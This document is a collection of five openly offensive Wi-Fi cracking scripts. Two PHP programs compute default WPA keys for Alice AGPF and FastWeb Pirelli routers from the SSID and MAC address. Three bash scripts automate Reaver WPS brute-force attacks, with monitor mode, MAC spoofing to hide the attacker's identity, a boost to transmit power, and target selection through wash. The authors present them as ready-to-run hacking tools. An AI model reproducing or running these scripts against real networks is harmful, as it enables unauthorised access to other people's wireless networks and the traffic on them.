<?php
/***************************************************************************
 *   Alice AGPF WPA Discovery                                              *
 *   by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net      *
 *   based on <http://wifiresearchers.wordpress.com/>                      *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/

/*
 * Tabella per il calcolo del seriale.
 *
 * First SSID digits => ( SN1, k, Q )
 */
$SN_TABLE   = array( '96' => array( '69102', 13, 96017051 ),
                     '93' => array( '69101', 13, 92398366 ),
                     '56' => array( '67902', 13, 54808800 ),
                     '55' => array( '67904', 8,  55164449 ),
                     '54' => array( '67903', 8,  52420689 ),
                     '48' => array( '67903', 8,  47896103 ),
                     '46' => array( '67902', 13, 39015145 ) );
/*
 * Numeri magici da utilizzare per il calcolo dell'SHA256.
 */
$ALIS       = "\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8";
/*
 * Tabella di conversione da hash a wpa.
 */
$CONV_TABLE = "0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuv".
              "wxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123";
/* 
 * SSID della rete.
 */
$SSID       = "Alice-96154825";
/*
 * MAC address del router.
 */
$MAC        = "\x00\x23\x8E\x01\x02\x03";
/*
 * Calcolo il seriale in base al SSID e alla tabella dei valori noti.
 */
$SN         = SSID2SN($SSID);
/*
 * Calcolo SHA256( MagicN + SN + MAC )
 */
$hash       = SHA256( $ALIS.$SN.$MAC );
/*
 * Converto la stringa dell'hash in un array di byte.
 */
$bytes      = hash2bytes($hash);
/*
 * Trovo la WPA utilizzando i primi 24 byte dell'hash come indici della tabella di covnersione.
 */
$wpa   = "";
for( $i = 0; $i < 24; $i++ ){
    $wpa .= $CONV_TABLE[ $bytes[$i] ];
}

echo "WPA : $wpa\n";

/*
 * Funzione per risalire al seriale del router partendo dal suo SSID e utilizzando
 * le tabelle dei valori noti.
 */
function SSID2SN( $ssid ){
    global $SN_TABLE;
    /*
     * Prelevo il numero intero dall'SSID e ne prendo le prime due cifre
     * per verificare che il router sia presente nella tabella.
     */
    preg_match_all( "/^Alice\-([0-9]+)/", $ssid, $m );

    $ssidn = $m[1][0];
    $id    = substr( $ssidn, 0, 2 );

    if( isset( $SN_TABLE[$id] ) ){
        /*
         * Ok, il router è presente nella tabella, prelevo la prima parte del seriale e
         * le costanti k e Q da utilizzare nell'equazione finale.
         */
        $sn1 = $SN_TABLE[$id][0];
        $k   = $SN_TABLE[$id][1];
        $Q   = $SN_TABLE[$id][2];
        /*
         * La seconda parte del seriale equivale a :
         *      (SSID - Q) / k
         */
        $sn2 = ((int)$ssidn - $Q) / $k; 
        /*
         * Restituisco il seriale completo.
         */
        return $sn1.'X'.sprintf( "%07s", $sn2 );
    }
    /*
     * Router non presente nella tabella.
     */
    else{
        die( "La serie 'Alice-$id******' non è presente nella tabella e non è supportata.\n" );
    }
}
/*
 * Funzione per il calcolo di un hash SHA256.
 */
function SHA256( $phrase ){
    return bin2hex( mhash( MHASH_SHA256, $phrase ) );
}
/*
 * Funzione per convertire un hash in un array di byte interi.
 */
function hash2bytes( $hash ){
    preg_match_all( "/[a-f0-9]{2}/i", $hash, $hash_bytes );
    $bytes = array();
    foreach( $hash_bytes[0] as $byte ){
        $bytes[] = hexdec($byte);
    }
    
    return $bytes;
}

?>

<?php
/***************************************************************************
 *   FastWeb Pirelli WPA Discovery                                         *
 *   by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net      *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/

/*
 * SSID di partenza.
 */
$ssid   = "FASTWEB-1-00193EA1B2C3";
/*
 * 20 byte costanti cablati nel firmware dei Pirelli Fastweb.
 */
$seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";
/*
 * Prelevo la parte finale del SSID.
 */ 
$sn     = split( '-', $ssid );
$sn     = $sn[2];
/*
 * La divido in gruppi di due caratteri, formando un array
 * di 6 rappresentazioni esadecimali di byte.
 */
preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes );
$sn_bytes = $sn_bytes[0];
/*
 * Inizializzo una stringa con il valore intero di questi byte.
 */
$str = "";
for( $i = 0; $i < 6; $i++ ){
    $str .= chr( hexdec( $sn_bytes[$i] ) );
}
echo "$str\n";

/* 
 * Aggiungo alla stringa i 20 byte "magici".
 */ 
$str .= $seq_20;
/*
 * Ricavo i byte dell'hash md5 della stringa
 */
preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes );
$md5_bytes = $md5_bytes[0];
$long      = "";
/*
 * Converto i byte in sequenze binarie di 8 bit.
 */
foreach( $md5_bytes as $byte ){
    $long .= sprintf( "%08s", decbin( hexdec($byte) ) );
}
/*
 * Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero 
 * di un gruppo sia maggiore di 0x0a, aggiungo 0x57.
 */
$hex_5 = array();
for( $i = 0; $i < 25; $i += 5 ){
    $n       = bindec( substr( $long, $i, 5 ) );
    $hex_5[] = $n > 0x0a ? $n + 0x57 : $n;
}
/*
 * Compongo la chiave.
 */ 
$wpa = "";
foreach( $hex_5 as $hex ){
    $wpa .= sprintf( "%02x", $hex );
}

print "WPA : $wpa\n";

?>

#!/bin/bash
# This is a linux bash script i wrote that runs best on Backtrack 5 KDE
# It automates reaver WPS bruteforce attack. simply save it to a text file (remove the .txt extension make #it .sh)
# then chmod +x <thefilename> and run it ./<filename>
# enjoy
 
# Attack WPS enabled routers
 
clear
tput setaf 2; echo "##################################################################################"
tput setaf 2; echo "#          ~Automate reaver WPS attack Bash script written by j0k3rr~            #"
tput setaf 2; echo "#    1-Tested on Backtrack 5 KDE                                                #"
tput setaf 2; echo "#    2-Make sure your wifi card is plugged in before starting the script        #"
tput setaf 2; echo "#    3-Any problems with the script feel free to contact me on twitter @j0k3rr1  #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "#                                                                                #"
tput setaf 2; echo "##################################################################################"
 
 
tput setaf 1; read -p "Press [Enter] to start hacking..."
 
clear
tput setaf 1; ifconfig | grep "wlan"
# Select your Wireless Interface ( wlan0 , wlan1, wlan2 )
 
tput setaf 2; read -p "Whats your Wireless interface? (Should be listed in red above) " winterface
 
# increase TX power to 30 dBm for wifi cards that can hanlde the shiznit
 
tput setaf 2; echo "Would you like to increase the TX Power of your wireless card to 30 dBm? Y/n"
read a
if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
        iw reg set BO
        iwconfig $winterface txpower 30
      else
      echo "continuing without changing the TX power"
fi
 
# Spoof Mac Address and put card into monitor mode
tput setaf 2; echo -e "Would you like to spoof the MAC address of your wifi card? Y/n"
 
read b
if [[ $b == "Y" || $b == "y" || $b = "" ]]; then
        wmac=00:11:22:33:44:55
        airmon-ng stop $winterface
        ifconfig $winterface down
        macchanger --mac 00:11:22:33:44:55 $winterface
        ifconfig $winterface up
        tput setaf 1; airmon-ng start $winterface
        else
        tput setaf 1; echo "continuing without changing the mac address"
        tput setaf 1; airmon-ng start $winterface
fi
 
 
tput setaf 2; read -p "Whats the monitor mode interface? (Usually mon0) " minterface
 
# Start airodump-ng to monitor the airwaves.
clear
tput setaf 1; echo  "About to start monitoring the air! "
sleep 3
konsole --hold -e wash -i $minterface
sleep 5
# Prompt user for Targets BSSID #
 
tput setaf 2; echo "Input the WPS enabled access points details: "
tput setaf 1; read -p "BSSID: " xBSSID
tput setaf 1; read -p "Channel number: " xCH
# Attack the Access point
 
konsole --hold -e reaver -i $minterface  -c $xCH -b $xBSSID -vv &
 
# End
 
clear
tput setaf 2; echo "[+] Process Started:"
tput setaf 2; echo "[+] Attacking " $xBSSID "on channel " $xCH " Goodluck and Happy Cracking"
wait

#!/bin/bash
clear
echo "This script makes it easy to start a reaver attack"
echo ""
echo "[+] Do you need to setup a monitor interface? [y/n]"
read setup
if [[ $setup == 'y' ]]; then
#Setup the monitor interface
echo "[+] What Wireless interfaces do we have..."
iwconfig
echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
read interface
if [[ $interface == '' ]]; then
interface=wlan0 #Default to wlan0
fi
echo "[+] Starting monitor Mode for $interface"
airmon-ng start $interface
iwconfig
fi #End Mon Mode Setup Portion
#Start part of script that executes regardless
echo "[+] What monitor interface should I use? [mon0]"
read monInterface
if [[ $monInterface == '' ]]; then
monInterface=mon0 #Default to mon0
fi
#Spoof the Mon Mac
echo "[+] MacSpoofing $monInterface"
ifconfig $monInterface down
macchanger -r $monInterface
ifconfig $monInterface up
#Check for Targets
echo ""
echo "[+] ------------------------------------------------------[+]"
echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
echo "[+] ------------------------------------------------------[+]"
wash -i $monInterface
#Set Reaver Target
echo "[+] What is the MAC for the target AP?"
read target
#Set optional functions
reaver #to show the options available in terminal
echo "[+] reaver -i $monInterface -b $target"
echo "[+] Type any other reaver options you'd like besides the above"
read reaverVars
#Start REAVERINGGGGG!!!!
echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)"
reaver -i $monInterface -b $target $reaverVars
#Stop Monitor Mode Interface if the script set it up
if [[ $setup == 'y' ]]; then
echo ""
echo "[+] killing Monitor Interface"
airmon-ng stop $monInterface
fi

#! /bin/bash
#WiFi Attack Script, v1.0
#Author: Vinay Gopinath
#Date: 26 October, 2012
 
#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)
wireless_interface=wlan0
 
#The timeout (in seconds) for wash to search for WPS-enabled access points
wash_timeout=15
 
#Flag to allow user to choose target AP
allow_user_choice=1
 
#Delay between attack attempts
reaver_delay=0
 
#Check for root privileges
if (( EUID != 0 )); then
  echo "This script needs root"
  exit 1
fi
 
#Check for required commands
for command in airmon-ng wash reaver
do
  if [[ -z $(which $command) ]]; then
     echo "$command was not found"
     echo "To install $command, you may follow this link"
     echo "http://lmgtfy.com/?q=$command+installation"
     exit 1
  fi
done
 
echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"
 
#Check available interfaces and close previous monitor interfaces and wireless lan
for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
do
  if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
    echo "* Shutting down $interface"
    airmon-ng stop $interface > /dev/null
  fi
done
 
echo "* Starting a new monitor interface mon0"
airmon-ng start $wireless_interface > /dev/null
 
echo "Identifying WPS-enabled access points"
timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')
 
if [[ -n $(echo $APs) ]]; then
   if  (( $allow_user_choice )); then
      n=1
      echo "The following access points were detected"
      for ap in $APs
      do
        echo "* $n: $ap"
        ((n++))
      done
      read -p "Enter your choice: " choice
      if [[ $choice -le $n ]]; then
        chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
echo "You have chosen $chosen_ap"
      else
echo "Invalid choice!"
exit 1
      fi
   else
      chosen_ap=$(echo "${APs}" | head -n1)
      echo "Proceeding with choice 1: $chosen_ap"
   fi
   tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
   rm washOutput.txt
   channel=$(echo $tempLine | cut -f2 -d' ')
   mac_address=$(echo $tempLine | cut -f1 -d' ')
   echo "Starting reaver"
   echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
   echo "AP name: $chosen_ap"
   echo "Channel: $channel"
   echo "MAC Address: $mac_address"
   reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
else
   echo "No networks found. Consider increasing the wash timeout. Terminating"
   exit 1
fi